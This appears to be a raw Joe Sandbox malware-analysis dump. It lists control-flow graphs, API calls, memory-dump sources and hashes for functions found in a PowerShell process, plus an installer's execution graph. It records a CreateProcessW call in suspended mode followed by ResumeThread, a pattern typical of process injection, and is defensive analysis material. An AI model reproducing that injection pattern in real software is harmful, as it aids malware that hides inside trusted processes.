                                                                                        control_flow_graph 568 4817e8c-4819598 571 48195a3-48195ac 568->571 572 481959a-48195a0 568->572 573 4819619-481961d 571->573 574 48195ae-48195db 571->574 572->571 575 4819648-4819658 573->575 576 481961f-4819642 573->576 580 481960b 574->580 581 48195dd-48195df 574->581 578 4819677-481967b 575->578 579 481965a-4819676 575->579 576->575 582 481967d-4819694 578->582 583 481969c-48196aa 578->583 579->578 589 4819610-4819613 580->589 585 4819601-4819609 581->585 586 48195e1-48195eb 581->586 582->583 587 48196c9-48196cd 583->587 588 48196ac-48196c8 583->588 585->589 590 48195ed 586->590 591 48195ef-48195fd 586->591 592 48196ed-4819706 587->592 593 48196cf-48196e5 587->593 588->587 589->573 590->591 591->591 595 48195ff 591->595 596 4819714-481971d 592->596 597 4819708-4819711 592->597 593->592 595->585 598 4819738-481973c 596->598 599 481971f-4819736 596->599 597->596 600 4819757-481976b 598->600 601 481973e-481974f 598->601 599->598 602 4819770-48197c5 CreateProcessW 600->602 603 481976d 600->603 601->600 604 48197c7-48197cd 602->604 605 48197ce-48197eb 602->605 603->602 604->605 608 4819801-481982b 605->608 609 48197ed-48197f9 605->609 612 481983b-481983f 608->612 613 481982d-4819831 608->613 609->608 614 4819841-4819845 612->614 615 4819854-4819858 612->615 613->612 616 4819833-4819836 call 4810444 613->616 614->615 618 4819847-481984a 614->618 619 481985a-481985e 615->619 620 481986d-4819871 615->620 616->612 618->615 619->620 621 4819860-4819863 619->621 622 4819873-4819877 620->622 623 4819886-481988a 620->623 621->620 622->623 624 4819879-481987c 622->624 625 481989b 623->625 626 481988c-4819898 623->626 624->623 628 481989c 625->628 626->625 628->628
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000004), ref: 048197B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1693044344.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4810000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 0eb82a34e46f9cb8d730be92d48ecb2e533557ae95017adeb4c0ea9581821b2e
                                                                                        • Instruction ID: d98f26aea81b5a3ea5ff8e7c7f7f5faaa29994324a3a8cf38d7bb4d0d3531d6e
                                                                                        • Opcode Fuzzy Hash: 0eb82a34e46f9cb8d730be92d48ecb2e533557ae95017adeb4c0ea9581821b2e
                                                                                        • Instruction Fuzzy Hash: 16C126B1D00219DFDB24CFA9C894BDDBBB5BF48304F25862AE405B7260DB74A985CF91
                                                                                        Function 04819516 Relevance: 1.8, APIs: 1, Instructions: 279COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 629 4819516-4819598 631 48195a3-48195ac 629->631 632 481959a-48195a0 629->632 633 4819619-481961d 631->633 634 48195ae-48195db 631->634 632->631 635 4819648-4819658 633->635 636 481961f-4819642 633->636 640 481960b 634->640 641 48195dd-48195df 634->641 638 4819677-481967b 635->638 639 481965a-4819676 635->639 636->635 642 481967d-4819694 638->642 643 481969c-48196aa 638->643 639->638 649 4819610-4819613 640->649 645 4819601-4819609 641->645 646 48195e1-48195eb 641->646 642->643 647 48196c9-48196cd 643->647 648 48196ac-48196c8 643->648 645->649 650 48195ed 646->650 651 48195ef-48195fd 646->651 652 48196ed-4819706 647->652 653 48196cf-48196e5 647->653 648->647 649->633 650->651 651->651 655 48195ff 651->655 656 4819714-481971d 652->656 657 4819708-4819711 652->657 653->652 655->645 658 4819738-481973c 656->658 659 481971f-4819736 656->659 657->656 660 4819757-481976b 658->660 661 481973e-481974f 658->661 659->658 662 4819770-48197c5 CreateProcessW 660->662 663 481976d 660->663 661->660 664 48197c7-48197cd 662->664 665 48197ce-48197eb 662->665 663->662 664->665 668 4819801-481982b 665->668 669 48197ed-48197f9 665->669 672 481983b-481983f 668->672 673 481982d-4819831 668->673 669->668 674 4819841-4819845 672->674 675 4819854-4819858 672->675 673->672 676 4819833-4819836 call 4810444 673->676 674->675 678 4819847-481984a 674->678 679 481985a-481985e 675->679 680 481986d-4819871 675->680 676->672 678->675 679->680 681 4819860-4819863 679->681 682 4819873-4819877 680->682 683 4819886-481988a 680->683 681->680 682->683 684 4819879-481987c 682->684 685 481989b 683->685 686 481988c-4819898 683->686 684->683 688 481989c 685->688 686->685 688->688
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1693044344.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4810000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0a23e92a9ba4a3d9acdde3fcf3b58c5b32d1d7f9eb56ab3b62dd15e5dca2e224
                                                                                        • Instruction ID: c5aa68ab9143e16751513a56c30af92ccb0b479d68dd8cc9864cc75394cb05a7
                                                                                        • Opcode Fuzzy Hash: 0a23e92a9ba4a3d9acdde3fcf3b58c5b32d1d7f9eb56ab3b62dd15e5dca2e224
                                                                                        • Instruction Fuzzy Hash: 63C127B1D00219DFDB24CFA9C894BDDBBB5BF48304F25862AE405B7260DB74A985CF91
                                                                                        Function 04817E98 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 689 4817e98-4819954 ResumeThread 692 4819956-481995c 689->692 693 481995d-481997a 689->693 692->693
                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(00000004), ref: 04819947
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1693044344.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4810000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 5893398d66f13f59a22ce59acc852dc2d651898ccc5b57814812128f314a6f70
                                                                                        • Instruction ID: 31578664295fb1a0d79738b312e00aa073515bf1f630eda7ce0e16c71c8178b4
                                                                                        • Opcode Fuzzy Hash: 5893398d66f13f59a22ce59acc852dc2d651898ccc5b57814812128f314a6f70
                                                                                        • Instruction Fuzzy Hash: 6D1125B19003488FCB10DF9EC548B9EFBF8EB49324F24845AD619A7350C774A944CFA5
                                                                                        Function 048198E2 Relevance: 1.5, APIs: 1, Instructions: 47threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 696 48198e2-4819954 ResumeThread 698 4819956-481995c 696->698 699 481995d-481997a 696->699 698->699
                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(00000004), ref: 04819947
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1693044344.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4810000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: f3e3f9c8a98d200ff794746fb4f18d57bceaa8e3e390af918c8ff5c4d288d776
                                                                                        • Instruction ID: 615f10997ce45e3deb9e2dff5fc2d24c6e562a06eb259660a8a7b34008c59c63
                                                                                        • Opcode Fuzzy Hash: f3e3f9c8a98d200ff794746fb4f18d57bceaa8e3e390af918c8ff5c4d288d776
                                                                                        • Instruction Fuzzy Hash: 1C1133B58002488FCB20DF9AD544BDEFFF8EB89320F24841AD659A3350C778A944CFA5
                                                                                        Function 02FED01D Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 879 2fed01d-2fed03d 880 2fed03f-2fed04a 879->880 881 2fed08d-2fed095 879->881 882 2fed04c-2fed05a 880->882 883 2fed082-2fed089 880->883 881->880 886 2fed060 882->886 883->882 887 2fed08b 883->887 888 2fed063-2fed06b 886->888 887->888 889 2fed06d-2fed075 888->889 890 2fed07b-2fed080 888->890 889->890 890->889
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1692802741.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2fed000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8588061dc6a0cf269851bb84b066039b4c39aeb412c40e254392f63a80d76daa
                                                                                        • Instruction ID: cc4e930f4dfe1831ad584c483ec7ea8d092d2ac8a6649d59b286ae431c688f41
                                                                                        • Opcode Fuzzy Hash: 8588061dc6a0cf269851bb84b066039b4c39aeb412c40e254392f63a80d76daa
                                                                                        • Instruction Fuzzy Hash: C40147725043049AEB114A19CC84B26BFDCDF517A4F0CC419EF0A0BA4AC3389841C7B1
                                                                                        Function 02FED005 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 866 2fed005-2fed03d 867 2fed03f-2fed04a 866->867 868 2fed08d-2fed095 866->868 869 2fed04c-2fed05a 867->869 870 2fed082-2fed089 867->870 868->867 873 2fed060 869->873 870->869 874 2fed08b 870->874 875 2fed063-2fed06b 873->875 874->875 876 2fed06d-2fed075 875->876 877 2fed07b-2fed080 875->877 876->877 877->876
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1692802741.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2fed000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ca1750921cab65e433c005ca40e816c189a7978d3678f81e0314b79a28c6a908
                                                                                        • Instruction ID: 57466012ce94d9920d97f87de95bde8bd0cb26f48f1aa50d16625f329c0fddb2
                                                                                        • Opcode Fuzzy Hash: ca1750921cab65e433c005ca40e816c189a7978d3678f81e0314b79a28c6a908
                                                                                        • Instruction Fuzzy Hash: 6501806140E3C05ED7138B258894B52BFB8DF53624F0DC0DBD9888F1A7C2695849C772

                                                                                        Execution Graph

                                                                                        Execution Coverage:18.8%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:16.1%
                                                                                        Total number of Nodes:1525
                                                                                        Total number of Limit Nodes:33
                                                                                        execution_graph 4341 402fc0 4342 401446 18 API calls 4341->4342 4343 402fc7 4342->4343 4344 403017 4343->4344 4345 40300a 4343->4345 4348 401a13 4343->4348 4346 406805 18 API calls 4344->4346 4347 401446 18 API calls 4345->4347 4346->4348 4347->4348 4349 4023c1 4350 40145c 18 API calls 4349->4350 4351 4023c8 4350->4351 4354 40726a 4351->4354 4357 406ed2 CreateFileW 4354->4357 4358 406f04 4357->4358 4359 406f1e ReadFile 4357->4359 4360 4062a3 11 API calls 4358->4360 4361 4023d6 4359->4361 4364 406f84 4359->4364 4360->4361 4362 4071e3 CloseHandle 4362->4361 4363 406f9b ReadFile lstrcpynA lstrcmpA 4363->4364 4365 406fe2 SetFilePointer ReadFile 4363->4365 4364->4361 4364->4362 4364->4363 4368 406fdd 4364->4368 4365->4362 4366 4070a8 ReadFile 4365->4366 4367 407138 4366->4367 4367->4366 4367->4368 4369 40715f SetFilePointer GlobalAlloc ReadFile 4367->4369 4368->4362 4370 4071a3 4369->4370 4371 4071bf lstrcpynW GlobalFree 4369->4371 4370->4370 4370->4371 4371->4362 4372 401cc3 4373 40145c 18 API calls 4372->4373 4374 401cca lstrlenW 4373->4374 4375 4030dc 4374->4375 4376 4030e3 4375->4376 4378 405f51 wsprintfW 4375->4378 4378->4376 4393 401c46 4394 40145c 18 API calls 4393->4394 4395 401c4c 4394->4395 4396 4062a3 11 API calls 4395->4396 4397 401c59 4396->4397 4398 406c9b 81 API calls 4397->4398 4399 401c64 4398->4399 4400 403049 4401 401446 18 API calls 4400->4401 4404 403050 4401->4404 4402 406805 18 API calls 4403 401a13 4402->4403 4404->4402 4404->4403 4405 40204a 4406 401446 18 API calls 4405->4406 4407 402051 IsWindow 4406->4407 4408 4018d3 4407->4408 4409 40324c 4410 403277 4409->4410 4411 40325e SetTimer 4409->4411 4412 4032cc 4410->4412 4413 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4410->4413 4411->4410 4413->4412 4414 4048cc 4415 4048f1 4414->4415 4416 4048da 4414->4416 4418 4048ff IsWindowVisible 4415->4418 4422 404916 4415->4422 4417 4048e0 4416->4417 4432 40495a 4416->4432 4419 403daf SendMessageW 4417->4419 4421 40490c 4418->4421 4418->4432 4423 4048ea 4419->4423 4420 404960 CallWindowProcW 4420->4423 4433 40484e SendMessageW 4421->4433 4422->4420 4438 406009 lstrcpynW 4422->4438 4426 404945 4439 405f51 wsprintfW 4426->4439 4428 40494c 4429 40141d 80 API calls 4428->4429 4430 404953 4429->4430 4440 406009 lstrcpynW 4430->4440 4432->4420 4434 404871 GetMessagePos ScreenToClient SendMessageW 4433->4434 4435 4048ab SendMessageW 4433->4435 4436 4048a3 4434->4436 4437 4048a8 4434->4437 4435->4436 4436->4422 4437->4435 4438->4426 4439->4428 4440->4432 4441 4022cc 4442 40145c 18 API calls 4441->4442 4443 4022d3 4442->4443 4444 4062d5 2 API calls 4443->4444 4445 4022d9 4444->4445 4446 4022e8 4445->4446 4450 405f51 wsprintfW 4445->4450 4449 4030e3 4446->4449 4451 405f51 wsprintfW 4446->4451 4450->4446 4451->4449 4221 4050cd 4222 405295 4221->4222 4223 4050ee GetDlgItem GetDlgItem GetDlgItem 4221->4223 4224 4052c6 4222->4224 4225 40529e GetDlgItem CreateThread CloseHandle 4222->4225 4270 403d98 SendMessageW 4223->4270 4227 4052f4 4224->4227 4229 4052e0 ShowWindow ShowWindow 4224->4229 4230 405316 4224->4230 4225->4224 4273 405047 83 API calls 4225->4273 4231 405352 4227->4231 4233 405305 4227->4233 4234 40532b ShowWindow 4227->4234 4228 405162 4241 406805 18 API calls 4228->4241 4272 403d98 SendMessageW 4229->4272 4235 403dca 8 API calls 4230->4235 4231->4230 4236 40535d SendMessageW 4231->4236 4237 403d18 SendMessageW 4233->4237 4239 40534b 4234->4239 4240 40533d 4234->4240 4238 40528e 4235->4238 4236->4238 4243 405376 CreatePopupMenu 4236->4243 4237->4230 4242 403d18 SendMessageW 4239->4242 4244 404f72 25 API calls 4240->4244 4245 405181 4241->4245 4242->4231 4246 406805 18 API calls 4243->4246 4244->4239 4247 4062a3 11 API calls 4245->4247 4249 405386 AppendMenuW 4246->4249 4248 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4247->4248 4250 4051f3 4248->4250 4251 4051d7 SendMessageW SendMessageW 4248->4251 4252 405399 GetWindowRect 4249->4252 4253 4053ac 4249->4253 4254 405206 4250->4254 4255 4051f8 SendMessageW 4250->4255 4251->4250 4256 4053b3 TrackPopupMenu 4252->4256 4253->4256 4257 403d3f 19 API calls 4254->4257 4255->4254 4256->4238 4258 4053d1 4256->4258 4259 405216 4257->4259 4260 4053ed SendMessageW 4258->4260 4261 405253 GetDlgItem SendMessageW 4259->4261 4262 40521f ShowWindow 4259->4262 4260->4260 4263 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4260->4263 4261->4238 4266 405276 SendMessageW SendMessageW 4261->4266 4264 405242 4262->4264 4265 405235 ShowWindow 4262->4265 4267 40542f SendMessageW 4263->4267 4271 403d98 SendMessageW 4264->4271 4265->4264 4266->4238 4267->4267 4268 40545a GlobalUnlock SetClipboardData CloseClipboard 4267->4268 4268->4238 4270->4228 4271->4261 4272->4227 4452 4030cf 4453 40145c 18 API calls 4452->4453 4454 4030d6 4453->4454 4456 4030dc 4454->4456 4459 4063ac GlobalAlloc lstrlenW 4454->4459 4457 4030e3 4456->4457 4486 405f51 wsprintfW 4456->4486 4460 4063e2 4459->4460 4461 406434 4459->4461 4462 40640f GetVersionExW 4460->4462 4487 40602b CharUpperW 4460->4487 4461->4456 4462->4461 4463 40643e 4462->4463 4464 406464 LoadLibraryA 4463->4464 4465 40644d 4463->4465 4464->4461 4468 406482 GetProcAddress GetProcAddress GetProcAddress 4464->4468 4465->4461 4467 406585 GlobalFree 4465->4467 4469 40659b LoadLibraryA 4467->4469 4470 4066dd FreeLibrary 4467->4470 4473 4064aa 4468->4473 4476 4065f5 4468->4476 4469->4461 4472 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4469->4472 4470->4461 4471 406651 FreeLibrary 4480 40662a 4471->4480 4472->4476 4474 4064ce FreeLibrary GlobalFree 4473->4474 4473->4476 4482 4064ea 4473->4482 4474->4461 4475 4066ea 4478 4066ef CloseHandle FreeLibrary 4475->4478 4476->4471 4476->4480 4477 4064fc lstrcpyW OpenProcess 4479 40654f CloseHandle CharUpperW lstrcmpW 4477->4479 4477->4482 4481 406704 CloseHandle 4478->4481 4479->4476 4479->4482 4480->4475 4483 406685 lstrcmpW 4480->4483 4484 4066b6 CloseHandle 4480->4484 4485 4066d4 CloseHandle 4480->4485 4481->4478 4482->4467 4482->4477 4482->4479 4483->4480 4483->4481 4484->4480 4485->4470 4486->4457 4487->4460 4488 407752 4492 407344 4488->4492 4489 407c6d 4490 4073c2 GlobalFree 4491 4073cb GlobalAlloc 4490->4491 4491->4489 4491->4492 4492->4489 4492->4490 4492->4491 4492->4492 4493 407443 GlobalAlloc 4492->4493 4494 40743a GlobalFree 4492->4494 4493->4489 4493->4492 4494->4493 4495 401dd3 4496 401446 18 API calls 4495->4496 4497 401dda 4496->4497 4498 401446 18 API calls 4497->4498 4499 4018d3 4498->4499 4507 402e55 4508 40145c 18 API calls 4507->4508 4509 402e63 4508->4509 4510 402e79 4509->4510 4511 40145c 18 API calls 4509->4511 4512 405e30 2 API calls 4510->4512 4511->4510 4513 402e7f 4512->4513 4537 405e50 GetFileAttributesW CreateFileW 4513->4537 4515 402e8c 4516 402f35 4515->4516 4517 402e98 GlobalAlloc 4515->4517 4520 4062a3 11 API calls 4516->4520 4518 402eb1 4517->4518 4519 402f2c CloseHandle 4517->4519 4538 403368 SetFilePointer 4518->4538 4519->4516 4522 402f45 4520->4522 4524 402f50 DeleteFileW 4522->4524 4525 402f63 4522->4525 4523 402eb7 4527 403336 ReadFile 4523->4527 4524->4525 4539 401435 4525->4539 4528 402ec0 GlobalAlloc 4527->4528 4529 402ed0 4528->4529 4530 402f04 WriteFile GlobalFree 4528->4530 4531 40337f 37 API calls 4529->4531 4532 40337f 37 API calls 4530->4532 4536 402edd 4531->4536 4533 402f29 4532->4533 4533->4519 4535 402efb GlobalFree 4535->4530 4536->4535 4537->4515 4538->4523 4540 404f72 25 API calls 4539->4540 4541 401443 4540->4541 4542 401cd5 4543 401446 18 API calls 4542->4543 4544 401cdd 4543->4544 4545 401446 18 API calls 4544->4545 4546 401ce8 4545->4546 4547 40145c 18 API calls 4546->4547 4548 401cf1 4547->4548 4549 401d07 lstrlenW 4548->4549 4550 401d43 4548->4550 4551 401d11 4549->4551 4551->4550 4555 406009 lstrcpynW 4551->4555 4553 401d2c 4553->4550 4554 401d39 lstrlenW 4553->4554 4554->4550 4555->4553 4556 403cd6 4557 403ce1 4556->4557 4558 403ce5 4557->4558 4559 403ce8 GlobalAlloc 4557->4559 4559->4558 4560 402cd7 4561 401446 18 API calls 4560->4561 4564 402c64 4561->4564 4562 402d99 4563 402d17 ReadFile 4563->4564 4564->4560 4564->4562 4564->4563 4565 402dd8 4566 402ddf 4565->4566 4567 4030e3 4565->4567 4568 402de5 FindClose 4566->4568 4568->4567 4569 401d5c 4570 40145c 18 API calls 4569->4570 4571 401d63 4570->4571 4572 40145c 18 API calls 4571->4572 4573 401d6c 4572->4573 4574 401d73 lstrcmpiW 4573->4574 4575 401d86 lstrcmpW 4573->4575 4576 401d79 4574->4576 4575->4576 4577 401c99 4575->4577 4576->4575 4576->4577 4279 407c5f 4280 407344 4279->4280 4281 4073c2 GlobalFree 4280->4281 4282 4073cb GlobalAlloc 4280->4282 4283 407c6d 4280->4283 4284 407443 GlobalAlloc 4280->4284 4285 40743a GlobalFree 4280->4285 4281->4282 4282->4280 4282->4283 4284->4280 4284->4283 4285->4284 4578 404363 4579 404373 4578->4579 4580 40439c 4578->4580 4582 403d3f 19 API calls 4579->4582 4581 403dca 8 API calls 4580->4581 4583 4043a8 4581->4583 4584 404380 SetDlgItemTextW 4582->4584 4584->4580 4585 4027e3 4586 4027e9 4585->4586 4587 4027f2 4586->4587 4588 402836 4586->4588 4601 401553 4587->4601 4589 40145c 18 API calls 4588->4589 4591 40283d 4589->4591 4593 4062a3 11 API calls 4591->4593 4592 4027f9 4594 40145c 18 API calls 4592->4594 4599 401a13 4592->4599 4595 40284d 4593->4595 4596 40280a RegDeleteValueW 4594->4596 4605 40149d RegOpenKeyExW 4595->4605 4597 4062a3 11 API calls 4596->4597 4600 40282a RegCloseKey 4597->4600 4600->4599 4602 401563 4601->4602 4603 40145c 18 API calls 4602->4603 4604 401589 RegOpenKeyExW 4603->4604 4604->4592 4611 401515 4605->4611 4613 4014c9 4605->4613 4606 4014ef RegEnumKeyW 4607 401501 RegCloseKey 4606->4607 4606->4613 4608 4062fc 3 API calls 4607->4608 4610 401511 4608->4610 4609 401526 RegCloseKey 4609->4611 4610->4611 4614 401541 RegDeleteKeyW 4610->4614 4611->4599 4612 40149d 3 API calls 4612->4613 4613->4606 4613->4607 4613->4609 4613->4612 4614->4611 4615 403f64 4616 403f90 4615->4616 4617 403f74 4615->4617 4619 403fc3 4616->4619 4620 403f96 SHGetPathFromIDListW 4616->4620 4626 405c84 GetDlgItemTextW 4617->4626 4622 403fad SendMessageW 4620->4622 4623 403fa6 4620->4623 4621 403f81 SendMessageW 4621->4616 4622->4619 4624 40141d 80 API calls 4623->4624 4624->4622 4626->4621 4627 402ae4 4628 402aeb 4627->4628 4629 4030e3 4627->4629 4630 402af2 CloseHandle 4628->4630 4630->4629 4631 402065 4632 401446 18 API calls 4631->4632 4633 40206d 4632->4633 4634 401446 18 API calls 4633->4634 4635 402076 GetDlgItem 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f51 wsprintfW 4636->4639 4639->4637 4640 402665 4641 40145c 18 API calls 4640->4641 4642 40266b 4641->4642 4643 40145c 18 API calls 4642->4643 4644 402674 4643->4644 4645 40145c 18 API calls 4644->4645 4646 40267d 4645->4646 4647 4062a3 11 API calls 4646->4647 4648 40268c 4647->4648 4649 4062d5 2 API calls 4648->4649 4650 402695 4649->4650 4651 4026a6 lstrlenW lstrlenW 4650->4651 4652 404f72 25 API calls 4650->4652 4655 4030e3 4650->4655 4653 404f72 25 API calls 4651->4653 4652->4650 4654 4026e8 SHFileOperationW 4653->4654 4654->4650 4654->4655 4663 401c69 4664 40145c 18 API calls 4663->4664 4665 401c70 4664->4665 4666 4062a3 11 API calls 4665->4666 4667 401c80 4666->4667 4668 405ca0 MessageBoxIndirectW 4667->4668 4669 401a13 4668->4669 4677 402f6e 4678 402f72 4677->4678 4679 402fae 4677->4679 4680 4062a3 11 API calls 4678->4680 4681 40145c 18 API calls 4679->4681 4682 402f7d 4680->4682 4687 402f9d 4681->4687 4683 4062a3 11 API calls 4682->4683 4684 402f90 4683->4684 4685 402fa2 4684->4685 4686 402f98 4684->4686 4689 4060e7 9 API calls 4685->4689 4688 403e74 5 API calls 4686->4688 4688->4687 4689->4687 4690 4023f0 4691 402403 4690->4691 4692 4024da 4690->4692 4693 40145c 18 API calls 4691->4693 4694 404f72 25 API calls 4692->4694 4695 40240a 4693->4695 4700 4024f1 4694->4700 4696 40145c 18 API calls 4695->4696 4697 402413 4696->4697 4698 402429 LoadLibraryExW 4697->4698 4699 40241b GetModuleHandleW 4697->4699 4701 40243e 4698->4701 4702 4024ce 4698->4702 4699->4698 4699->4701 4714 406365 GlobalAlloc WideCharToMultiByte 4701->4714 4703 404f72 25 API calls 4702->4703 4703->4692 4705 402449 4706 40248c 4705->4706 4707 40244f 4705->4707 4708 404f72 25 API calls 4706->4708 4710 401435 25 API calls 4707->4710 4712 40245f 4707->4712 4709 402496 4708->4709 4711 4062a3 11 API calls 4709->4711 4710->4712 4711->4712 4712->4700 4713 4024c0 FreeLibrary 4712->4713 4713->4700 4715 406390 GetProcAddress 4714->4715 4716 40639d GlobalFree 4714->4716 4715->4716 4716->4705 4717 402df3 4718 402dfa 4717->4718 4720 4019ec 4717->4720 4719 402e07 FindNextFileW 4718->4719 4719->4720 4721 402e16 4719->4721 4723 406009 lstrcpynW 4721->4723 4723->4720 4076 402175 4077 401446 18 API calls 4076->4077 4078 40217c 4077->4078 4079 401446 18 API calls 4078->4079 4080 402186 4079->4080 4081 4062a3 11 API calls 4080->4081 4085 402197 4080->4085 4081->4085 4082 4021aa EnableWindow 4084 4030e3 4082->4084 4083 40219f ShowWindow 4083->4084 4085->4082 4085->4083 4731 404077 4732 404081 4731->4732 4733 404084 lstrcpynW lstrlenW 4731->4733 4732->4733 4102 405479 4103 405491 4102->4103 4104 4055cd 4102->4104 4103->4104 4105 40549d 4103->4105 4106 40561e 4104->4106 4107 4055de GetDlgItem GetDlgItem 4104->4107 4108 4054a8 SetWindowPos 4105->4108 4109 4054bb 4105->4109 4111 405678 4106->4111 4119 40139d 80 API calls 4106->4119 4172 403d3f 4107->4172 4108->4109 4113 4054c0 ShowWindow 4109->4113 4114 4054d8 4109->4114 4112 403daf SendMessageW 4111->4112 4132 4055c8 4111->4132 4142 40568a 4112->4142 4113->4114 4116 4054e0 DestroyWindow 4114->4116 4117 4054fa 4114->4117 4115 405608 KiUserCallbackDispatcher 4118 40141d 80 API calls 4115->4118 4171 4058dc 4116->4171 4120 405510 4117->4120 4121 4054ff SetWindowLongW 4117->4121 4118->4106 4122 405650 4119->4122 4125 4055b9 4120->4125 4126 40551c GetDlgItem 4120->4126 4121->4132 4122->4111 4127 405654 SendMessageW 4122->4127 4123 40141d 80 API calls 4123->4142 4124 4058de KiUserCallbackDispatcher KiUserCallbackDispatcher 4124->4171 4181 403dca 4125->4181 4130 40554c 4126->4130 4131 40552f SendMessageW IsWindowEnabled 4126->4131 4127->4132 4129 40590d ShowWindow 4129->4132 4134 405559 4130->4134 4135 4055a0 SendMessageW 4130->4135 4136 40556c 4130->4136 4145 405551 4130->4145 4131->4130 4131->4132 4133 406805 18 API calls 4133->4142 4134->4135 4134->4145 4135->4125 4139 405574 4136->4139 4140 405589 4136->4140 4138 403d3f 19 API calls 4138->4142 4143 40141d 80 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4141 405587 4141->4125 4142->4123 4142->4124 4142->4132 4142->4133 4142->4138 4147 403d3f 19 API calls 4142->4147 4162 40581e DestroyWindow 4142->4162 4143->4145 4146 405590 4144->4146 4178 403d18 4145->4178 4146->4125 4146->4145 4148 405705 GetDlgItem 4147->4148 4149 405723 ShowWindow KiUserCallbackDispatcher 4148->4149 4150 40571a 4148->4150 4175 403d85 KiUserCallbackDispatcher 4149->4175 4150->4149 4152 40574d EnableWindow 4155 405761 4152->4155 4153 405766 GetSystemMenu EnableMenuItem SendMessageW 4154 405796 SendMessageW 4153->4154 4153->4155 4154->4155 4155->4153 4176 403d98 SendMessageW 4155->4176 4177 406009 lstrcpynW 4155->4177 4158 4057c4 lstrlenW 4159 406805 18 API calls 4158->4159 4160 4057da SetWindowTextW 4159->4160 4161 40139d 80 API calls 4160->4161 4161->4142 4163 405838 CreateDialogParamW 4162->4163 4162->4171 4164 40586b 4163->4164 4163->4171 4165 403d3f 19 API calls 4164->4165 4166 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4165->4166 4167 40139d 80 API calls 4166->4167 4168 4058bc 4167->4168 4168->4132 4169 4058c4 ShowWindow 4168->4169 4170 403daf SendMessageW 4169->4170 4170->4171 4171->4129 4171->4132 4173 406805 18 API calls 4172->4173 4174 403d4a SetDlgItemTextW 4173->4174 4174->4115 4175->4152 4176->4155 4177->4158 4179 403d25 SendMessageW 4178->4179 4180 403d1f 4178->4180 4179->4141 4180->4179 4182 403ddf GetWindowLongW 4181->4182 4192 403e68 4181->4192 4183 403df0 4182->4183 4182->4192 4184 403e02 4183->4184 4185 403dff GetSysColor 4183->4185 4186 403e12 SetBkMode 4184->4186 4187 403e08 SetTextColor 4184->4187 4185->4184 4188 403e30 4186->4188 4189 403e2a GetSysColor 4186->4189 4187->4186 4190 403e41 4188->4190 4191 403e37 SetBkColor 4188->4191 4189->4188 4190->4192 4193 403e54 DeleteObject 4190->4193 4194 403e5b CreateBrushIndirect 4190->4194 4191->4190 4192->4132 4193->4194 4194->4192 4734 4020f9 GetDC GetDeviceCaps 4735 401446 18 API calls 4734->4735 4736 402116 MulDiv 4735->4736 4737 401446 18 API calls 4736->4737 4738 40212c 4737->4738 4739 406805 18 API calls 4738->4739 4740 402165 CreateFontIndirectW 4739->4740 4741 4030dc 4740->4741 4742 4030e3 4741->4742 